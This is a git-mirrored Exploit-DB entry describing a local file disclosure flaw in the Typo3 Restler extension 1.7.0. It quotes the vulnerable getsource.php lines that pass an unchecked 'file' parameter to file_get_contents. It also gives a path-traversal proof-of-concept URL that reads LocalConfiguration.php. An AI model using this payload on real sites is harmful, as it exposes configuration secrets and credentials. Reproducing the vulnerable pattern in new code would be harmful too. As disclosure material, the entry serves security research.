bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/42985.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

28 lines
No EOL
768 B
Text
Raw Blame History

# Exploit Title: Typo3 Restler Extension - Local File Disclosure
# Date: 2017-10-13
# Exploit Author: CrashBandicot @dosperl
# Vendor Homepage: https://www.aoe.com/
# Software Link: https://extensions.typo3.org/extension/restler/
# Tested on : MsWin
# Version: 1.7.0 (last)
# Vulnerability File : getsource.php
3. $file = $_GET['file'];
13. $text = file_get_contents($file);
16. die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");
# PoC :
# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
# https://i.imgur.com/zObmaDD.png
# Timeline :
# Vulnerability identified
# Vendor notified
# CVE number requested
# Exploit released
Reference in a new issue View git blame Copy permalink